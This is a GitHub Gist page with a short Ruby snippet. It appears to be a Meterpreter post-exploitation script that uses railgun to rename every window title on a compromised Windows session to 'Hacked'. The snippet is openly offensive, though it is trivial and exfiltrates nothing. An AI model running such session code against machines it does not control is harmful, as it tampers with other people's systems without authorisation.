-
-
Save prashanth-sams/940b2133ddcd249e91de52095eccc1a4 to your computer and use it in GitHub Desktop.
Sets all of the windows titles for the current user to "Hacked"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| windows = client.extapi.window.enumerate | |
| windows.each do |winder| | |
| if winder[:title] != 'Default IME' | |
| result = client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked") | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment